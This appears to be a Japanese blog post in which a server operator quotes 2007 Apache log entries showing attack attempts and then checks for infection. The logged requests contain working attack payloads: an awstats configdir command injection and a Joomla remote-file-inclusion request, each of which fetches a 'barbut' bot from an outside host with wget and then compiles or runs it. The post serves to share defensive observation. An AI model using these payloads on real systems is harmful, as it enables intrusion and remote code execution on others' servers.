… "200 OK" …?^^;
apache のログー
193.251.191.*** - - [21/Nov/2007:11:50:46 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.***/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close"
193.251.191.*** - - [21/Nov/2007:11:50:49 +0900] "GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.***/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close"
193.251.191.*** - - [21/Nov/2007:11:50:54 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.***/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close"
62.105.180.*** - - [21/Nov/2007:21:47:29 +0900] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.***/cmd.gif HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close"
いざこんなログが残ると、やっぱり Web ってのは恐ろしいと感じてしまいますわ。 ツールを動作させるために「ねじ込む」って感じですねホント。
で、ところで、
62.105.180.*** - - [21/Nov/2007:21:47:30 +0900] "GET ?=?&cmd=cd /tmp;killall -9barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.***/barbut.c;gcc barbut.c-o barbut;./barbut ; HTTP/1.1" 200 8 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close"
"GET (中略); HTTP/1.1" 200 8 "-" "Mozilla/4.0 (略
…ん?^^;
一応
# ps -aux | grep barbut root 9788 0.0 0.1 4952 756 pts/1 S+ 21:37 0:00 grep barbut*1 # killall -9 barbut barbut: no process killed
ってことで、大丈夫だとはー思うんだけどー…
*1:引っかかってちょっとびっくりした:ぉ
